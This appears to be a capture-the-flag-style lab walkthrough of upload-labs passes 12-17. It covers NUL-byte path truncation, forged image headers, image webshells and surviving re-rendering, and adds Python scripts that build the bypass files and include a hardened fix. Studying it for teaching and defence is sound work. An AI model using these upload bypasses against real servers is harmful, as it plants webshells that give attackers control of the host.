Local Lab 2: File Upload Vulnerabilities (III) - Network Security
2022-06-13 07:53:00 【gaog2zh】
12. Pass-12: whitelist, %00 truncation
View source code (part)

```php
...
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
...
```

Analysis:
- The code before this line extracts the file extension and filters it against a whitelist (jpg, png, gif).
- The directory the file is saved to is taken from the GET parameter save_path, so the client controls the beginning of the path.

Exploitation idea: the path arrives as a GET parameter, so use %00 truncation.

Steps:
- Upload a PHP file normally, with its extension renamed to one of jpg, png or gif.
- Intercept the request in Burp Suite and pass the parameters shown in the figure (not reproduced here): the wanted .php name goes into save_path followed by %00, so that the random number, timestamp and whitelisted extension the server appends are discarded.

Principle:
Conditions:
- PHP version < 5.3.4 (tested: 5.3.29 did not work, 5.2.17 succeeded)
- magic_quotes_gpc off (with it on, the NUL byte is escaped to \0 and no longer truncates)

In a URL, %00 encodes ASCII 0. ASCII 0 (NUL, chr(0)) is reserved as the string terminator in C-style strings, so once the path reaches code that treats it that way, reading stops at the NUL. The core of the truncation is the chr(0) character: it is not PHP's null, not the empty string "", and not a space. When a variable contains chr(0), everything after it is dropped; in other words, chr(0) is mistaken for the terminator and the data that follows is ignored. PHP strings themselves may contain NUL bytes; before 5.3.4 the filesystem functions handed such a path to the underlying C API unchecked, which is why the whitelisted extension appended by the server never reaches the filesystem. From 5.3.4 on, a path containing a NUL byte is rejected, which is why the test on 5.3.29 failed.

Applicable condition: the upload path is controllable.
13. Pass-13: whitelist, 0x00 truncation
View source code (part)

```php
...
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
...
```

Analysis: identical to Pass-12, except that save_path is now read from POST.

Exploitation idea: the path arrives as a POST parameter, so use 0x00 truncation.

Steps:
- Upload a PHP file normally, with its extension renamed to one of jpg, png or gif.
- Intercept the request in Burp Suite.
- Method 1: edit the POST parameter directly, but remember to URL-decode the %00 in Burp so that a real NUL byte is sent (figure not reproduced).
- Method 2: append any character after 1.php, then switch to the Hex tab and change that byte to 00 (figure not reproduced).

Principle:
Conditions:
- PHP version < 5.3.4 (tested: 5.3.29 did not work, 5.2.17 succeeded)
- magic_quotes_gpc off

Same as Pass-12, except that the parameter is received via POST. The upload form is multipart/form-data, and the fields of a multipart body are not URL-decoded, so a literal %00 typed into the field stays as the three characters %, 0, 0 and nothing is truncated. The NUL has to be sent as a raw byte: either URL-decode %00 in place, or edit the byte to 00 (that is, 0x00) in the Hex view.

Applicable condition: the upload path is controllable.
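The following Python script is an added example for Pass-12 and Pass-13; it is not upload-labs code. It mirrors the PHP path concatenation from both passes, shows what a C-string filesystem call sees once a NUL byte is in the path, contrasts the URL-decoded GET parameter with an undecoded multipart POST field, and ends with a hardened version of the path construction. The random number, timestamp, the UPLOAD_DIR location and the multipart bodies are constructed values chosen for reproducibility.

```python
import os
import urllib.parse

# Assumed server-side upload location (not taken from upload-labs)
UPLOAD_DIR = "/var/www/upload"
ALLOWED_EXT = {"jpg", "png", "gif"}


def build_img_path(save_path: str, file_ext: str, rand: int = 42, ts: str = "20220613075300") -> str:
    """Mirror of: $img_path = $save_path."/".rand(10, 99).date("YmdHis").".".$file_ext;
    rand and ts are fixed constructed values so the result is reproducible."""
    return f"{save_path}/{rand}{ts}.{file_ext}"


def as_seen_by_c_api(path: str) -> str:
    """PHP strings may hold NUL bytes, but a C-string filesystem call stops at the first one.
    PHP < 5.3.4 passed such paths through unchecked; 5.3.4+ rejects them outright."""
    nul = path.find("\x00")
    return path if nul < 0 else path[:nul]


def save_path_from_query(query: str) -> str:
    """Pass-12: save_path is in the query string, which PHP URL-decodes, so %00 becomes a NUL."""
    return urllib.parse.parse_qs(query, keep_blank_values=True)["save_path"][0]


def save_path_from_multipart(body: bytes, boundary: bytes) -> str:
    """Pass-13: save_path is a multipart/form-data field. Multipart bodies are not URL-decoded,
    so a literal '%00' stays three characters; only a raw 0x00 byte truncates."""
    for part in body.split(b"--" + boundary):
        if b'name="save_path"' in part:
            _headers, _sep, value = part.partition(b"\r\n\r\n")
            return value.rstrip(b"\r\n").decode("latin-1")
    raise ValueError("save_path field not found")


def server_side_img_path(file_ext: str, rand: int = 42, ts: str = "20220613075300") -> str:
    """Hardened variant: the client never chooses the directory, and the extension is checked
    after rejecting NUL bytes, so neither truncation nor path traversal reaches the filesystem."""
    if "\x00" in file_ext:
        raise ValueError("NUL byte in extension")
    ext = file_ext.lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    return os.path.join(UPLOAD_DIR, f"{rand}{ts}.{ext}")


if __name__ == "__main__":
    # Pass-12 style request: ../upload/1.php%00 in the query string
    p12 = build_img_path(save_path_from_query("save_path=../upload/1.php%00"), "jpg")
    print(repr(p12), "->", as_seen_by_c_api(p12))
    # Pass-13 style request (constructed bodies): the same value in a multipart field,
    # once with a literal %00 and once with a raw NUL byte
    literal = (b"--B\r\nContent-Disposition: form-data; name=\"save_path\"\r\n\r\n"
               b"../upload/1.php%00\r\n--B--\r\n")
    raw = literal.replace(b"%00", b"\x00")
    for body in (literal, raw):
        p13 = build_img_path(save_path_from_multipart(body, b"B"), "jpg")
        print(repr(p13), "->", as_seen_by_c_api(p13))
```

Running it shows the GET case and the raw-byte POST case both collapsing to ../upload/1.php, while the multipart field with a literal %00 keeps its .jpg extension. The hardened function is the fix that survives independently of the PHP version: the client supplies only the file, never the directory.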
14. Pass-14: content and other checks, file header detection
View source code (file header detection part)

```php
function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); // read only 2 bytes
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
    $fileType = '';
    switch($typeCode){
        case 255216:
            $fileType = 'jpg';
            break;
        case 13780:
            $fileType = 'png';
            break;
        case 7173:
            $fileType = 'gif';
            break;
        default:
            $fileType = 'unknown';
    }
    return $fileType;
}
```

Analysis: the function reads the first 2 bytes of the file, unpacks each as an unsigned byte, concatenates their decimal values into a string and converts it to an integer, then compares that number against jpg (FF D8 = 255 216), png (89 50 = 137 80) and gif (47 49 = 71 73); anything else is reported as unknown.

Exploitation idea:
Forge the file header
- JPEG (jpg), file header: FF D8 FF
- PNG (png), file header: 89 50 4E 47
- GIF (gif), file header: 47 49 46 38
Or build an image webshell (a genuine image with the PHP appended)

Steps
Forging the header:
- Upload a PHP file containing a one-line PHP webshell.
- Intercept the request and insert the file header bytes in front of the PHP code.
- Connect with China Chopper (菜刀).

Building an image webshell:
- On Windows: copy 1.png /b + 1.php /a 2.png
- Upload 2.png.
- Connect with China Chopper.

Principle: every file format starts with its own signature (magic bytes). By forging the header, or by appending the PHP to a genuine image, a type check that only looks at the file header is bypassed, and the shell is then reached through China Chopper. Note that passing the header check only gets the file onto the server; whether the PHP inside it ever runs depends on something else executing the image as PHP, which this page does not cover.
15. Pass-15: content and other checks, getimagesize
Same idea and principle as Pass-14; for the details of the getimagesize function, consult the PHP documentation. Note that getimagesize parses more than the first two bytes (for a GIF it needs the full GIF89a signature and the width and height that follow it), so the reliable approach is the image webshell built with copy /b, whose image data is intact.
16. Pass-16: content and other checks, exif_imagetype
Same idea and principle as Pass-14; for the details of the exif_imagetype function, consult the PHP documentation.
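The following Python script is an added example for Pass-14 through Pass-16, not code from upload-labs. It ports the two-byte check of getReailFileType() to Python, builds both bypass files described above (forged header and image webshell), and adds a simplified model of an image-parsing check that needs the real signature and size fields, to show why the image webshell is the more robust of the two. The 1x1 GIF and the PHP probe (a harmless phpinfo() stand-in for the one-line webshell) are constructed inputs; gif_dimensions() is written for this example and is not PHP's getimagesize() code.

```python
import struct

# Constructed sample inputs: a minimal valid 1x1 GIF89a and a harmless PHP probe
MINIMAL_GIF = (
    b"GIF89a"                                    # signature
    b"\x01\x00\x01\x00\x80\x00\x00"              # logical screen: 1x1, global colour table of 2 entries
    b"\x00\x00\x00\xff\xff\xff"                  # colour table: black, white
    b"\x21\xf9\x04\x01\x00\x00\x00\x00"          # graphic control extension
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor
    b"\x02\x02\x44\x01\x00"                      # LZW image data
    b"\x3b"                                      # trailer
)
PHP_PROBE = b"<?php phpinfo(); ?>"

# The page's header values: JPEG FF D8 FF, PNG 89 50 4E 47, GIF 47 49 46 38
MAGIC = {"jpg": b"\xff\xd8\xff", "png": b"\x89\x50\x4e\x47", "gif": b"\x47\x49\x46\x38"}


def pass14_file_type(data: bytes) -> str:
    """Python port of getReailFileType(): take the first two bytes as unsigned integers,
    concatenate their decimal representations and compare the resulting number."""
    if len(data) < 2:
        return "unknown"
    b1, b2 = struct.unpack("BB", data[:2])
    type_code = int(f"{b1}{b2}")        # FF D8 -> "255"+"216" -> 255216
    return {255216: "jpg", 13780: "png", 7173: "gif"}.get(type_code, "unknown")


def forge_header(kind: str, payload: bytes) -> bytes:
    """Method 1 from the page: prepend only the magic bytes to the PHP file."""
    return MAGIC[kind] + payload


def image_shell(image: bytes, payload: bytes) -> bytes:
    """Method 2 from the page, the equivalent of: copy 1.png /b + 1.php /a 2.png"""
    return image + payload


def gif_dimensions(data: bytes):
    """Simplified model (written for this example, not PHP's code) of what an image-parsing
    check such as getimagesize() needs from a GIF: the full 6-byte signature plus a non-zero
    width and height from the logical screen descriptor. Returns (w, h) or None."""
    if len(data) < 10 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    width, height = struct.unpack("<HH", data[6:10])
    return (width, height) if width and height else None


if __name__ == "__main__":
    forged = forge_header("gif", PHP_PROBE)
    shell = image_shell(MINIMAL_GIF, PHP_PROBE)
    for name, blob in (("php", PHP_PROBE), ("forged", forged), ("image shell", shell)):
        print(f"{name:12s} pass14={pass14_file_type(blob):8s} gif_dims={gif_dimensions(blob)}")
```

The forged-header file passes the two-byte check but fails the size-parsing model, because bytes 4 to 9 are PHP text rather than a GIF signature and screen descriptor; the image webshell passes both because the original image is untouched and the payload only trails it. That is also why no header or parser check on its own prevents the upload: the defence has to be that the upload directory never executes PHP, or that the image is re-encoded, which is what Pass-17 does.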
17. Pass-17: content and other checks, secondary rendering
Only the secondary rendering problem is considered here.
Take a GIF, build an image webshell with the copy command, upload it, and compare the file before and after upload: the secondary rendering strips the code appended at the end.
Clearly an image webshell made this way loses its payload as soon as it is uploaded.
Exploitation idea: the secondary rendering nevertheless leaves part of the file contents unchanged. So before building the image webshell, first observe which region of the image stays the same before and after re-rendering, and write the code into that region to bypass the secondary rendering.
Steps:
- Use 010Editor to compare the uploaded file with the original and locate the region whose bytes are unchanged (figure not reproduced).
- Write the code into that region, upload again and compare (figure not reproduced).
This completes the bypass. Which region survives differs with the format and size of the image.
- Principle: secondary rendering keeps part of the original file's bytes intact. Insert the one-line webshell there, connect with China Chopper, and the bypass is complete.
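The following Python script is an added example, not code from the page or from upload-labs: it performs the byte-level comparison that the 010Editor step does by hand, picks a surviving region large enough for the payload while keeping the GIF signature and logical screen descriptor untouched, and overwrites bytes in place rather than appending. BEFORE and AFTER are constructed stand-ins for the uploaded file and the server's re-rendered copy; with real files, read them from disk and run the same functions.

```python
# Constructed stand-ins: 256 distinct bytes, of which the "renderer" rewrote 64..127
BEFORE = bytes(range(256))
AFTER = BEFORE[:64] + bytes(64) + BEFORE[128:]

GIF_HEADER_LEN = 13   # GIF signature (6) + logical screen descriptor (7): never overwrite these


def unchanged_runs(before: bytes, after: bytes, min_len: int = 16):
    """Return (offset, length) for every stretch of at least min_len bytes that is
    identical at the same offset in both files; this is what the 010Editor diff shows."""
    runs = []
    n = min(len(before), len(after))
    i = 0
    while i < n:
        if before[i] != after[i]:
            i += 1
            continue
        j = i
        while j < n and before[j] == after[j]:
            j += 1
        if j - i >= min_len:
            runs.append((i, j - i))
        i = j
    return runs


def choose_slot(runs, payload_len: int, reserve: int = GIF_HEADER_LEN) -> int:
    """First offset >= reserve that lies inside an unchanged run with room for the payload.
    Raises ValueError when nothing large enough survived the re-rendering."""
    for offset, length in runs:
        start = max(offset, reserve)
        if offset + length - start >= payload_len:
            return start
    raise ValueError("no unchanged region large enough for the payload")


def plant_payload(image: bytes, offset: int, payload: bytes) -> bytes:
    """Overwrite bytes in place so the file length and surrounding structure stay the same;
    appending (copy /b) is exactly what the secondary rendering throws away."""
    if offset + len(payload) > len(image):
        raise ValueError("payload does not fit")
    return image[:offset] + payload + image[offset + len(payload):]


if __name__ == "__main__":
    payload = b"<?php phpinfo(); ?>"   # harmless probe in place of the one-line webshell
    runs = unchanged_runs(BEFORE, AFTER)
    print("unchanged runs:", runs)
    slot = choose_slot(runs, len(payload))
    planted = plant_payload(BEFORE, slot, payload)
    print("payload planted at", slot, "file length unchanged:", len(planted) == len(BEFORE))
```

After planting, upload the file again and re-run unchanged_runs() against the new server copy: the payload offsets must appear inside a surviving run, otherwise the encoder rewrote them and a different slot is needed. Overwriting a region that an encoder preserves (for a GIF this is typically inside the colour table rather than the header) keeps the file decodable, which is the whole point of this pass.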
18-21
For the remaining passes only a reference link is given (it is not reproduced here), without a detailed walkthrough; if you run into problems, feel free to ask.